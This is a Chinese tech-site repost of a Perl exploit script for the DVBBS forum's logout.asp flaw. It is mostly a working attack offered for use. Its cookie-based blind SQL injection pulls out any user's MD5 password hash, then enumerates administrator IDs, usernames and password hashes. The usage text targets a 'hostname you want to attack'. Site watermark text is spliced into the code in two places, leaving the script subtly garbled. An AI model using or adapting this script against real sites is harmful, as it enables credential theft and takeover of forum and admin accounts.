首页 电脑 电脑学堂 查看内容

获取任意用户MD5加密信息的测试程序

2005-3-27 10:16 720 0

摘要: 来源:热点网络 --------------------[获取任意用户MD5加密信息的测试程序: #!/usr/bin/perl #Codz By PsKey<PsKey@hotma...

来源:热点网络 --------------------[获取任意用户MD5加密信息的测试程序: #!/usr/bin/perl #Codz By PsKey<[email protected]> #Exploit of DVBBS's logout.asp   #-------------------------------------------------------------------------- #  本脚本针对动网论坛logout.asp文件缺陷而写,可以推算出所有用户 #  MD5加密密码;另外可以自动破解后台管理员ID、username、password #  脚本参照最新版本编写,若低版本出现不能用的情况,请自行修改程序 #  脚本利用方法: #  1:在目标论坛以 ilikecat/catlikeme 注册一用户,并得到此用户的 userid #  2:再另注册一任意用户(此步不可少) #  3:运行脚本,按帮助输入命令参数 #  如果是MSSQL版,请把这段糟糕的脚本扔到一边 #--------------------------------------------------------------------------   $|=1; use Socket; use Getopt::Std; getopt('hpwium');   print "\n             ===================================================\n"; print "                       Exploit of DVBBS's logout.asp\n"; print "                     Codz By PsKey<PsKey\@hotmail.com>     \n"; print "                       http://www.isgrey.com/ && c4st.51.net              \n"; print "                       Thanx Envymask<130\@21cn.com>            \n"; print "             ===================================================\n";   &usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));   $host=$opt_h; $port=$opt_p||80; $path=$opt_w; $userid=$opt_i; $user=$opt_u; $mode=$opt_m;   if ($opt_m eq "p") { &usage unless defined($opt_u); print "\nPlease wait...\n\n"; for ($j=1;$j<=16;$j++) { @dic1=(0..9); @dic2=(a..f); @dic=(@dic1,@dic2); &first; for ($i=0;$i<@dic;$i++) { print "$dic[$i]"; $key=$pws.$dic[$i]; $target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1"; &second; if ("@in" !~ /ilikecat/)  {     $th=$j.th;     print "\n\/\/------------The $th word of the password is $dic[$i]";     $pws=$pws.$dic[$i];     last; } } } print "\n\nSuccessful,the full password of $user is $pws.\n"; }   elsif ($opt_m eq "b") {   #Crack ID print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id..."; &first; for ($i=0;$i<=50;$i++) { $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1"; &second; if ("@in" !~ /ilikecat/)  {     print "\n--------->>There is one admin's id $i";     push (@id,$i);     &first; } } print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n"; sleep(2);   #Crack the length of admin's username print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n"; for ($j=0;$j<@id;$j++) { print "  \|\-\>cracking username's length which id is $id[$j] ..."; &first; for ($i=0;$i<=50;$i++) { $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1"; &second; if ("@in" !~ /ilikecat/)  {     print "\n--------->>The length of $id[$j] is $i";     push (@len,$i);=版权所有  软件 下载  学院  版权所有=     &first;     last; } } } print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n"; sleep(2);   #Crack admin's username print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n"; @dic1=(0..9); @dic2=(a..z); @dic=(@dic1,@dic2); for ($j=0;$j<@id;$j++) { $pws=""; print "  \|\-\>cracking username which id is $id[$j] ...";   OUTER: for ($k=1;$k<=$len[$j];$k++) {   &first;   USERNAME: for ($i=0;$i<@dic;$i++) {   print "$dic[$i].";   $key=$pws.$dic[$i];   $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";   &second;   if ("@in" !~ /ilikecat/)  {     $th=$k.th;     print "\n--------->>The $th word of $id[$j] username is $dic[$i]";     $pws=$pws.$dic[$i];     last USERNAME;         }   if ($dic[$i] eq "z") {     print "\ni can't crack this admin's name,maybe it is chinese.\n";     push (@user,"\?");     last OUTER;         }       }     }   push (@user,$pws);   print "\n========>>The username is $pws which id is $id[$j]\n"; } print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n"; sleep(2);   #Crack admin's password print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n"; @dic1=(0..9); @dic2=(a..f); @dic=(@dic1,@dic2); for ($j=0;$j<@id;$j++) { $pws=""; print "  \|\-\>cracking password which id is $id[$j] ...";   for ($k=1;$k<=16;$k++) {   &first;   PASSWORD: for ($i=0;$i<@dic;$i++) {   print "$dic[$i].";   $key=$pws.$dic[$i];   $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";   &second;   if ("@in" !~ /ilikecat/)  {     $th=$k.th;     print "\n--------->>The $th word of $id[$j] password is $dic[$i]";     $pws=$pws.$dic[$i];     last PASSWORD;         }       }     }   push (@pass,$pws);   print "\n\n========>>The password is $pws which id is $id[$j]\n\n"; } print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n"; print "We got them now:\n"; printf("%-4s %-20s %-16s\n",ID,UserName,PassWord); for ($i=0;$i<@id;$i++) { printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]); } }   else { &usage; }   sub first { $str="username=ilikecat&password=catlikeme&CookieDate=1"; $len=length($str); $req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".        "Referer: http://$host$path/login.asp\n".        "Host: $host\n".        "Content-Length: $len\n".        "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".        "\n".        "$str\n\n"; print "\n."; sendraw($req); $req0 = "GET $path/index.asp HTTP/1.0\n".         "Referer: http://$host$path/index.asp\n".         "Host: $host\n".         "Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n"; print ".\n"; sendraw($req0); }   sub second { $req1 = "GET $path/logout.asp HTTP/1.0\n".         "Host: $host\n".         "Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n"; print "."; @res = sendraw($req1); $req2 = "GET $path/index.asp?action=show HTTP/1.0\n".         "Referer: http://$host$path/index.asp?action=show \n".         "Host: $host\n".         "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n"; print "."; @in = sendraw($req2); }   sub usage { print qq~ Usage: $0 -h <Host> [-p <port>] -w <path> -i <userid> -m <mode> [-u <user>]     -h   =hostname you want to attack     -p   =port,80 default     -w   =the web path such as "/dvbbs"     -i   =the userid of ilikecat     -m   =only two choice,b<background> and p<proscenium>(This option need -u)     -u   =the user you want to crack Eg: 1.Crack proscenium      $0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m p -u admin      2.Crack background      $0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m b ~; exit; }   sub sendraw {     my ($req) = @_;     my $target;     $target = inet_aton($host) || die("inet_aton problems\n");     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");     if(connect(S,pack "SnA4x8",2,$port,$target)){         select(S);     $| = 1;         print $req;     my @res = <S>;         select(STDOUT);     close(S);         return @res;     }     else { =版权所有  软件 下载  学院  版权所有=     die("Can't connect...\n");     } }
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部